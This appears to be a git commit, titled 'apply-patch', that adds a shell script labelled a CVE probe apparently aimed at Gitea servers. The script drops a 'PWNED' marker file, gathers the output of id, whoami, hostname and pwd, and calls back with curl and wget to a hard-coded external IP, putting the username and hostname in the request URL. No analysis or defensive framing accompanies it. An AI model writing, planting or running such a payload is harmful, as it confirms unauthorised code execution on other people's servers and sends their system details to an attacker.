apply-patch

This commit is contained in:
2026-07-29 08:02:35 +08:00
parent 305f9fdfa8
commit d86615c56e
+11
View File
@@ -0,0 +1,11 @@
#!/bin/sh
# CVE-2026-60004 probe
echo "PWNED_$(date +%s)" > /tmp/gitea_pwn_marker
id > /tmp/gitea_pwn_id
whoami >> /tmp/gitea_pwn_id
hostname >> /tmp/gitea_pwn_id
pwd >> /tmp/gitea_pwn_id
# Callback via curl (timeout 3s to prevent blocking)
curl -s -m 3 http://202.79.169.91:28016/pwned_id_$(whoami)_$(hostname) || true
# Callback via wget
wget -qO- --timeout=3 http://202.79.169.91:28016/pwned_wget || true